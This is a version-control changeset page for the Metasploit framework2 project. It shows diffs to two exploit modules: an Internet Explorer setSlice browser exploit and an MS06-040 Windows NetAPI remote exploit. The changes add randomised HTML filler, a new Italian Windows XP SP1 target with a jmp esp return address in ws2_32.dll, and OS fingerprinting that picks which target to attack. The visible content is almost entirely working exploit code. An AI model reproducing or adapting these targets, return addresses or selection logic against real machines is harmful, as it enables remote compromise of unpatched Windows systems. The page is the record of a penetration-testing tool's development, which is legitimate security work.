Changeset 4006

Show
Ignore:
Timestamp:
10/01/06 21:10:52 (2 years ago)
Author:
hdm
Message:

Cleanup, random HTML in setslice, fixed targets in netapi

Files:

Legend:

Unmodified
Added
Removed
Modified
Copied
Moved

  • framework2/trunk/exploits/ie_webview_setslice.pm

    r4004 r4006  
    150150        my $diff          = int(rand(0xffffff)+4000); 
    151151        my $over          = 0x7ffffffe - $diff; 
    152          
     152        my $html          = Pex::Text::AlphaNumText(int(rand(1024))+32); 
    153153        my $data      = qq# 
    154154<html > 
     
    187187</head > 
    188188<body > 
    189 Loaded... 
     189${html} 
    190190</body > 
    191191</html > 

  • framework2/trunk/exploits/netapi_ms06_040.pm

    r3819 r4006  
    8484                [ '(wcscpy) Windows XP SP0/SP1', 612, 0x00020804 ], 
    8585                [ '(stack)  Windows XP SP1 English', 656, 680, 0x71ab1d54], # jmp esp @ ws2_32.dll 
     86                [ '(stack)  Windows XP SP1 Italian', 656, 680, 0x71a37bfb], # jmp esp @ ws2_32.dll (thanks diaul!) 
    8687          ], 
    8788 
     
    143144                return; 
    144145        } 
     146         
    145147 
    146148    if ( $target->[0] =~ /Automatic/ ) { 
     
    152154            $target = $self->Targets->[2]; 
    153155            $self->PrintLine('[*] Detected a Windows XP target'); 
    154                         $self->PrintLine('[*] This will not work on SP2!'); 
    155         } 
    156         elsif ( $smb->PeerNativeOS eq 'Windows 4.0' ) { 
     156                        $self->PrintLine('[*] This will not work on Service Pack 2!'); 
     157        } 
     158        elsif ( $smb->PeerNativeOS eq 'Windows NT 4.0' ) { 
    157159            $target = $self->Targets->[1]; 
    158160            $self->PrintLine('[*] Detected a Windows NT 4.0 target'); 
    159                         $self->PrintLine('[*] Please email us with the results!'); 
    160         }                
     161        } 
     162        elsif ( $smb->PeerNativeOS =~ m/Windows Server 2003 (\d+)$/ ) { 
     163            $self->PrintLine("[*] Detected a Windows 2003 (Build $1 - No Service Pack) target"); 
     164                        $self->PrintLine("[*] This system is not yet supported."); 
     165                        return; 
     166        } 
     167        elsif ( $smb->PeerNativeOS =~ m/Windows Server 2003 (\d+) Service Pack (\d+)/ ) { 
     168            $self->PrintLine("[*] Detected a Windows 2003 (Build $1 - Service Pack $2) target"); 
     169                        $self->PrintLine("[*] This system is probably not exploitable"); 
     170                        return; 
     171        }                                                                                
    161172        else { 
    162173            $self->PrintLine('[*] No target available for ' . $smb->PeerNativeOS() ); 
     
    164175        } 
    165176    } 
    166                  
     177 
    167178        # 
    168179        #  /* Function 0x1f at 0x767e912c */